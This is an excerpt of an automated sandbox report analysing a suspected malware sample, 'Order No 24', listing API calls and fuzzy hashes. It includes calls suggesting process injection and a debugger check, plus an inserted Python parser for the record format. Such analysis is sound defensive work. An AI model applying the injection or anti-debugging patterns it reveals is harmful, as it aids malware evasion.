                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009CC385,?,?,?,?,?,00000004), ref: 009CC6F2
                                                                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009CC708
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,009CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009CC70F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                  • Opcode ID: ee79da8c8f03acd2656866713318312ab0c6389a7660661386b5dbad3e59b7ba
                                                                                                                                  • Instruction ID: d62a209aa522a4a0c7f214362866109eda39126882d4db084d33174eb410fa54
                                                                                                                                  • Opcode Fuzzy Hash: ee79da8c8f03acd2656866713318312ab0c6389a7660661386b5dbad3e59b7ba
                                                                                                                                  • Instruction Fuzzy Hash: C5E08633140218B7D7215BD4AC09FCA7F18EB05760F104210FB14690E097B125538799
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 009CBB72
                                                                                                                                    • Part of subcall function 009A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,009A7A85), ref: 009A1CB1
                                                                                                                                    • Part of subcall function 009A1C9D: GetLastError.KERNEL32(00000000,?,009A7A85), ref: 009A1CC3
                                                                                                                                  • _free.LIBCMT ref: 009CBB83
                                                                                                                                  • _free.LIBCMT ref: 009CBB95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                                                  • Instruction ID: 508681b008552f981ea6066e29bc8f5808ab3a123371406cb72a543aafc28401
                                                                                                                                  • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                                                  • Instruction Fuzzy Hash: 90E012A1A4174147DA2465796E45FB337EC4F46361F14081DB499E7146CF24EC4085F4
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009824F1), ref: 00982303
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009825A1
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00982618
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009F503A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3815369404-0
                                                                                                                                  • Opcode ID: 437884affdd979f33261cda5083834bb64ab872dfbf147758646b3d47f5e9c02
                                                                                                                                  • Instruction ID: 5d04e6a69485e34dbd895cf33232b78c4ce3da3158cf672c0f82b978149c7058
                                                                                                                                  • Opcode Fuzzy Hash: 437884affdd979f33261cda5083834bb64ab872dfbf147758646b3d47f5e9c02
                                                                                                                                  • Instruction Fuzzy Hash: 0371BBBC9413858B8344EFEAE990594BBA4FBDA344790423ED119CB3B1DBB25482CF55
                                                                                                                                  APIs
                                                                                                                                  • _strcat.LIBCMT ref: 009E08FD
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • _wcscpy.LIBCMT ref: 009E098C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1012013722-0
                                                                                                                                  • Opcode ID: e953bec8fc449d042f1073b0362a69ae811efaeec666b61699dae80e69165737
                                                                                                                                  • Instruction ID: 7f39c15b75412541f97cae9b1005ac7d838885e13635bbb70f84a1ad9dd726ec
                                                                                                                                  • Opcode Fuzzy Hash: e953bec8fc449d042f1073b0362a69ae811efaeec666b61699dae80e69165737
                                                                                                                                  • Instruction Fuzzy Hash: AC913934A00605DFCB19EF29C495A6DB7E5FF89310B54846AF85A8F3A2DB74ED41CB80
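The function records in this listing are uniform enough to parse, which is what an analyst needs in order to pivot on an Opcode ID or Instruction Fuzzy Hash across reports, or to pull out every function whose API list contains a watched call such as IsDebuggerPresent. The following is an added example and is not code from the Joe Sandbox report or its IDA plugin: it parses the record format as it appears above (the `• Name.MODULE(args), ref: addr` API lines, the `Part of subcall function` nesting, and the `• Key: value` metadata fields), fed with two records copied from this listing, the second deliberately cut off after its API list, as the report itself truncates records at the end of a page. The watchlist, the assumption that `Instruction Fuzzy Hash` is always the last field of a complete record, and the pivot key it builds are this example's own choices, not conventions documented by the report.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two records copied from this report's listing. The first
# is complete; the second is cut off after its API list, as on the page.
SAMPLE = """\
APIs
  • Part of subcall function 009822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,009824F1), ref: 00982303
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009825A1
• CoInitialize.OLE32(00000000), ref: 00982618
• CloseHandle.KERNEL32(00000000), ref: 009F503A
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 3815369404-0
• Opcode ID: 437884affdd979f33261cda5083834bb64ab872dfbf147758646b3d47f5e9c02
• Instruction Fuzzy Hash: 0371BBBC9413858B8344EFEAE990594BBA4FBDA344790423ED119CB3B1DBB25482CF55
APIs
• IsThemeActive.UXTHEME ref: 00983A73
  • Part of subcall function 009A1405: __lock.LIBCMT ref: 009A140B
  • Part of subcall function 00983D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
  • Part of subcall function 00983D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983AB3
"""

# One API line: optional "Part of subcall function <addr>:" prefix, then
# Name.MODULE, an optional "(args)" list, then "ref: <call-site address>".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@$?]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Any other "• Key: value" metadata line (Opcode ID, Instruction Fuzzy Hash, ...).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")

# Analyst-chosen watchlist for this example, not a list taken from the report.
WATCHLIST = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
             "OutputDebugStringA", "OutputDebugStringW"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                   # address of the call site
    caller: int | None = None  # set when the call sits inside a subcall


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    @property
    def complete(self) -> bool:
        # Assumption: the Instruction Fuzzy Hash closes every full record.
        return "Instruction Fuzzy Hash" in self.fields


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        # "APIs" always opens a record; "Memory Dump Source" opens one only when
        # the previous record is complete (records with no calls have no "APIs").
        if line == "APIs" or (line == "Memory Dump Source"
                              and (current is None or current.complete)):
            if current is not None:
                records.append(current)
            current = FunctionRecord()
            continue
        if current is None:
            continue
        m = API_RE.match(raw)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            caller = int(m.group("caller"), 16) if m.group("caller") else None
            current.apis.append(ApiCall(m.group("name"), m.group("module"),
                                        args, int(m.group("ref"), 16), caller))
            continue
        m = FIELD_RE.match(raw)
        if m:
            current.fields[m.group("key")] = m.group("value")
    if current is not None:          # keep a trailing partial record
        records.append(current)
    return records


def pivot_key(rec: FunctionRecord) -> tuple[str, str] | None:
    """(Opcode ID, Instruction Fuzzy Hash) for cross-report lookup, or None."""
    if not rec.complete:
        return None
    return rec.fields["Opcode ID"], rec.fields["Instruction Fuzzy Hash"]


def flag_records(records: list[FunctionRecord]) -> list[tuple[int, list[ApiCall]]]:
    """Index and watched calls of every record that touches the watchlist."""
    hits = []
    for idx, rec in enumerate(records):
        watched = [c for c in rec.apis if c.name in WATCHLIST]
        if watched:
            hits.append((idx, watched))
    return hits
```

Run over `SAMPLE`, `flag_records` returns only the second record, with the IsDebuggerPresent call at 00983D57 attributed to the subcall 00983D19, and `pivot_key` returns None for it because the listing was cut before its hashes; the first record yields its Opcode ID and Instruction Fuzzy Hash pair, which is what you would search for in other reports.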
                                                                                                                                  APIs
                                                                                                                                  • IsThemeActive.UXTHEME ref: 00983A73
                                                                                                                                    • Part of subcall function 009A1405: __lock.LIBCMT ref: 009A140B
                                                                                                                                    • Part of subcall function 00983ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00983AF3
                                                                                                                                    • Part of subcall function 00983ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983B08
                                                                                                                                    • Part of subcall function 00983D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
                                                                                                                                    • Part of subcall function 00983D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
                                                                                                                                    • Part of subcall function 00983D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A41148,00A41130,?,?,?,?,00983AA3,?), ref: 00983DC8
                                                                                                                                    • Part of subcall function 00983D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00983AA3,?), ref: 00983E48
                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00983AB3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 924797094-0
                                                                                                                                  • Opcode ID: 2ceb93e448c119bc247b14a8e33c413037cb2120cc439ddb4bde83c5cd38fe2d
                                                                                                                                  • Instruction ID: fe22c88dc19f85efc026247672d9f2124057e674ff52a7538e9eb71d5a0fb390
                                                                                                                                  • Opcode Fuzzy Hash: 2ceb93e448c119bc247b14a8e33c413037cb2120cc439ddb4bde83c5cd38fe2d
                                                                                                                                  • Instruction Fuzzy Hash: 6F119D799043459BC700EFA9E845A1AFBE8EFD5710F008A1EF584872B1DB719586CB92
                                                                                                                                  APIs
                                                                                                                                  • ___lock_fhandle.LIBCMT ref: 009AEA29
                                                                                                                                  • __close_nolock.LIBCMT ref: 009AEA42
                                                                                                                                    • Part of subcall function 009A7BDA: __getptd_noexit.LIBCMT ref: 009A7BDA
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1046115767-0
                                                                                                                                  • Opcode ID: a6d6c7cd62c54fdf85e7c44365530e3b3bd5678a81d51e397ab0a145aa122323
                                                                                                                                  • Instruction ID: ab1adb769c226374799a33618d11cfbf708dbf84a6c39411d4f6aa78d9a90c86
                                                                                                                                  • Opcode Fuzzy Hash: a6d6c7cd62c54fdf85e7c44365530e3b3bd5678a81d51e397ab0a145aa122323
                                                                                                                                  • Instruction Fuzzy Hash: 25116172909A109BD712FFA8D8427597A616FC3331F2A4740E4745F2E3CBB88D419BE5
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009A395C: __FF_MSGBANNER.LIBCMT ref: 009A3973
                                                                                                                                    • Part of subcall function 009A395C: __NMSG_WRITE.LIBCMT ref: 009A397A
                                                                                                                                    • Part of subcall function 009A395C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                                                                                                                  • std::exception::exception.LIBCMT ref: 0099F51E
                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0099F533
                                                                                                                                    • Part of subcall function 009A6805: RaiseException.KERNEL32(?,?,0000000E,00A36A30,?,?,?,0099F538,0000000E,00A36A30,?,00000001), ref: 009A6856
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3902256705-0
                                                                                                                                  • Opcode ID: 0af3465038f27d9b9597f5a9183839db9380c6ccb17744082f633c6e1b57ad43
                                                                                                                                  • Instruction ID: ddc979936068279e354130890936f5e837d11c368109dc43e43a6fa141375ede
                                                                                                                                  • Opcode Fuzzy Hash: 0af3465038f27d9b9597f5a9183839db9380c6ccb17744082f633c6e1b57ad43
                                                                                                                                  • Instruction Fuzzy Hash: 66F0C23210421EA7DB04BF9CEC11AEEB7ECAF42394F648429F908D6191DBB0D74097E6
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  • __lock_file.LIBCMT ref: 009A3629
                                                                                                                                    • Part of subcall function 009A4E1C: __lock.LIBCMT ref: 009A4E3F
                                                                                                                                  • __fclose_nolock.LIBCMT ref: 009A3634
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                  • Opcode ID: 067936094661bf7719c87fb06912719c24e66ab1afc2c327e2ae1a98399cc834
                                                                                                                                  • Instruction ID: 1096c25ae8a3a3df5eb9bf6e881b740fdced9eb4f38bc9ddb80cea89b15e2073
                                                                                                                                  • Opcode Fuzzy Hash: 067936094661bf7719c87fb06912719c24e66ab1afc2c327e2ae1a98399cc834
                                                                                                                                  • Instruction Fuzzy Hash: 47F0B431941304BAD711BFA5880776EBAA46F93330F29C508F424AB2C1CB7C8A419FD5
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0127336B
                                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01273401
                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01273423
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438371351-0
                                                                                                                                  • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                                                                  • Instruction ID: 6286de31d24608bdf8008cfe9d0dbde82f60d3d04c464df4ebb66a6dc3630fb7
                                                                                                                                  • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                                                                                                  • Instruction Fuzzy Hash: 9B12CC24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A4E85CB5A
                                                                                                                                  APIs
                                                                                                                                  • __flush.LIBCMT ref: 009A2A0B
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __flush__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4101623367-0
                                                                                                                                  • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                  • Instruction ID: 5b7fcf8c8cdb0e010a63e7952921957f866d808f893e3c67d09d17f0ae0143d5
                                                                                                                                  • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                                                                  • Instruction Fuzzy Hash: 374171717007069FDF289FADC9815AF7BAAAF86760F24852DE855C7280EB74DD418BC0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                  • Instruction ID: b36805fd3aee2fe21ff73e94e5f4ce187949a24df468892b163488423e2a52ef
                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                  • Instruction Fuzzy Hash: 5131C574A00105DBDB18DF5CC480A69FBBAFF49340F648AA5E409CB296DB35EDC1CB90
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 751eb69868c7810d1146c3d7af6e9a233e2b39424bca3a9f68a7fbf2f269f846
                                                                                                                                  • Instruction ID: 125c1e65b35f5788d37f7c913a68c089ea16670995a4ea4abd35c0e0b3d3ff30
                                                                                                                                  • Opcode Fuzzy Hash: 751eb69868c7810d1146c3d7af6e9a233e2b39424bca3a9f68a7fbf2f269f846
                                                                                                                                  • Instruction Fuzzy Hash: 4A412F745087558FDB24DF18C494B2ABBE0BF85308F19895CE99A4B362C376F885CF52
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00984214: FreeLibrary.KERNEL32(00000000,?), ref: 00984247
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
                                                                                                                                    • Part of subcall function 00984291: FreeLibrary.KERNEL32(00000000), ref: 009842C4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Free$Load
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2391024519-0
                                                                                                                                  • Opcode ID: bf9551f153ae0633d7ff0110748039e5476401376a59987d882185054429ffb9
                                                                                                                                  • Instruction ID: 3d8a005dfbb1beb56e51d64ca91ec7b9feb78af5a32148126faed5ad0ef974f2
                                                                                                                                  • Opcode Fuzzy Hash: bf9551f153ae0633d7ff0110748039e5476401376a59987d882185054429ffb9
                                                                                                                                  • Instruction Fuzzy Hash: BC11A731604207BBDF10FB74DD06FAE77E99F80700F108829F5A6A62C1DA75DA059B61
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
